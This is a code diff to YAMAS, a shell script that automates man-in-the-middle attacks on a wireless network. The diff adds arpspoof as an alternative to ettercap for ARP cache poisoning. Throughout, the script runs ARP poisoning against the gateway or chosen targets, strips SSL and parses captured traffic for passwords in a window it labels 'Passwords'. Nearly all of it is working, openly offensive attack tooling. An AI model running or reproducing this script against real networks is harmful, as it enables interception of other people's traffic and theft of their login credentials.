@@ -1,10 +1,10 @@
 #!/bin/sh
 
 # Bash script to launch man it the middle attack and sslstrip.
-# Based on yamas v0.9 by comaX for pcsci3ence.info
+# Based on yamas v1.0 by comaX for pcsci3ence.info
 
 #Version information
-version=0.9.9
+version=1.0
 
 # device variables
 pathLog=/home/user/yamas
@@ -38,6 +38,14 @@ dep() {
      echo 0 >> ./test.txt
    fi
    
+   echo -en "\t Dsniff(arpspoof)\t"
+   if dpkg -l | grep -w dsniff 1>/dev/null; then 
+     echo -e "\033[32m[Success]\033[m"
+   else 
+     echo -e "\t\033[31m[Failed!]\033[m"
+     echo 0 >> ./test.txt
+   fi
+   
    echo -en "\t xterm\t\t"
    if dpkg -l | grep -w " xterm" 1>/dev/null; then 
      echo -e "\t\033[32m[Success]\033[m"
@@ -86,15 +94,7 @@ dep() {
      echo 0 >> ./test.txt
    fi
      
-   echo -en "\t ettercap\t"
-   if dpkg -l | grep ettercap-common 1>/dev/null; then 
-     echo -e "\t\033[32m[Success]\033[m"
-   else 
-     echo -e "\t\033[31m[Failed!]\033[m"
-     echo 0 >> ./test.txt
-   fi
-
-   echo -en "\t python-twisted-web"
+    echo -en "\t python-twisted-web"
    if dpkg -l | grep python-twisted-web 1>/dev/null; then 
      echo -e "\t\033[32m[Success]\033[m"
    else 
@@ -138,6 +138,8 @@ do
       dep # calling the function.
       ;;
       
+   -e | --ettercap) etter=1 ;;
+      
    -v | --version) #Print version and exits
       clear
       echo "YAMAS - Yet Another Man In The Middle Automation Script"
@@ -234,9 +236,8 @@ echo -e "\b
 =       Check out the help (-h) to see edition informations               =
 =       You are running \033[32mYAMAS-arm\033[m                                       =
 
-===========================================================================
-
-Make sure you checked your dependencies with -d option before running this script\n"
+==========================================================================="
+if [[ $etter = 1 ]]; then echo "Using Ettercap instead of Arpspoof";fi ### CONTROL THIS BITCH
 
 # Starting fresh : reset IP forward and iptables
 echo -e "\033[31m [+] Cleaning iptables \033[m"
@@ -250,13 +251,15 @@ echo "[-] Cleaned."
 # Defining exit function and other ending features
 fast_cleanup() {
    echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
-   if [[ "${looparseid}" != "" ]]; then kill ${looparseid}
+   if [[ "${looparseid}" != "" ]]; then kill ${looparseid}; fi
+   if [[ "${sslstripid}" != "" ]]; then kill ${sslstripid}; fi
+   if [[ "${tailgrepid}" != "" ]]; then kill ${tailgrepid}; fi
+   
+   if [[ "$etter" = "1" ]];then
+      killall ettercap
+   else
+      killall arpspoof
    fi
-   if [[ "${sslstripid}" != "" ]]; then kill ${sslstripid}
-   fi
-   if [[ "${tailgrepid}" != "" ]]; then kill ${tailgrepid}
-   fi
-   killall ettercap
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
    iptables --flush                 # there are probably too many resets here,
    iptables --table nat --flush     # but at least we're sure everything's clean
@@ -279,7 +282,12 @@ cleanup() {
    if [[ "${tailgrepid}" != "" ]]; then 
       kill ${tailgrepid}
    fi
-   killall ettercap
+   
+   if [[ "$etter" = "1" ]];then
+      killall ettercap
+   else
+      killall arpspoof
+   fi
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
    iptables --flush                 # there are probably too many resets here,
    iptables --table nat --flush     # but at least we're sure everything's clean
@@ -342,7 +350,11 @@ rescan () {
 add_target() {
    echo "Enter a new IP adress to attack :"
    read newip
-   xterm -T "Poisoning $newip" -e "sudo ettercap -o -q -i wlan0 -T -M arp  /$newip/ //" 2>/dev/null & sleep 2
+   if [[ "$etter" = "1" ]];then
+      xterm -T "Poisoning $newip" -e "sudo ettercap -o -q -i wlan0 -T -M arp  /$newip/ //" 2>/dev/null & sleep 2
+   else
+      xterm -T "Poisoning $newip" -e "sudo arpspoof -i wlan0 -t $newip $gateway" 2>/dev/null & sleep 2
+   fi
    final
 }
 
@@ -352,11 +364,6 @@ ascii() {
    final
 }
 
-tailsecure() {
-   xterm -T "Tail-greping for secure references" -e "tail -f $pathLog/$filename.txt | grep 'Resolving host:'" 2> /dev/null & tailgrepid=$!
-   final
-}
-
 rtparse() {
    echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
    1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
@@ -395,29 +402,20 @@ final() {
    1. Rescan network.
    2. Add a target (useless if targeting whole network).
    3. Display ASCII correspondence table.
-   4. Tail-grep hosts through output (make sure there is traffic).
-   5. Real-time parsing...
-   6. Quit properly.
+   4. Real-time parsing...
+   5. Quit properly.
 
    Enter the number of the desired option."
    read final
-   if [ "$final" = "1" ] ; then
-      rescan
-   elif [ "$final" = "2" ] ; then
-     add_target
-   elif [ "$final" = "3" ] ; then
-     ascii
-   elif [ "$final" = "4" ] ; then
-     tailsecure
-   elif [ "$final" = "5" ] ; then
-     rtparse
-   elif [ "$final" = "6" ] ; then
-     cleanup
-   else 
-      echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
-      final
-   fi
-}
+   case $final in 
+   1) rescan ;;
+   2) add_target ;;
+   3) ascii ;;
+   4) rtparse ;;
+   5) cleanup ;;
+   *) echo -e "\033[31mBad choice bro !\033[m\n" ;; #was "motherfucker" during my tests.
+   esac 
+   }
 
 ###############################End of functions#############################
 
@@ -498,25 +496,43 @@ if [[ "$choicearp" = "D" || "$choicearp" = "d" ]] ; then
       fi
    echo -e "Please enter targets according to usage : IP1 IP2 IP3 ... IPn
    \033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
-   ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
+   arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
+      while [ "$1" != "" ]; do
+         xterm -T "Poisoning $1" -e "arpspoof -i wlan0 -t $1 $gateway" 2>/dev/null & sleep 2
+         shift
+      done
+      echo -e "\033[33m Targeting $parameters on $gateway through wlan0.\033[m"
+   }
+   
+   ettercapi() { # We launch Ettercap in different xterm windows to keep script running
       while [ "$1" != "" ]; do
          xterm -T "Poisoning $1" -e "ettercap -o -q -i wlan0 -T -M arp /$1/ /$gateway/" 2>/dev/null & sleep 2
          shift
       done
       echo -e "\033[33m Targeting $parameters on $gateway through wlan0.\033[m"
    }
+   
    echo "Enter IP adresse(s)."
    read parameters
    if [[ "$parameters" == "" ]]; then 
       echo -e "No input given. Nothing to target so quitting.."
       exit 0
    else
-      ettercapi $parameters
+      if [[ "$etter" = "1" ]];then
+         ettercapi $parameters
+      else
+         arpspoofi $parameters
+      fi
    fi
 else 
-   xterm -T ettercap -e "ettercap -o -q -i wlan0 -T -M arp  /$gateway/ //" 2> /dev/null &
+   if [[ "$etter" = "1" ]];then
+      xterm -T ettercap -e "ettercap -o -q -i wlan0 -T -M arp  /$gateway/ //" 2> /dev/null &
+   else
+      xterm -T Arpspoof -e "arpspoof -i wlan0 $gateway" 2> /dev/null &
+   fi
+
    sleep 2
-   echo -e "\033[33m Targeting the whole network on $gateway on wlan0 with Ettercap\033[m"
+   echo -e "\033[33m Targeting the whole network on $gateway on wlan0\033[m"
    echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
 fi
 
@@ -545,4 +561,4 @@ chmod +x /tmp/looparse.sh
 xterm -hold -T Passwords -e "/tmp/looparse.sh" 2> /dev/null & looparseid=$! #here's the beauty
 sleep 2
 final #call the "final" function. Yes, it's the final one.
-### End of the script fellas.
+### End of the script fellas.
\ No newline at end of file
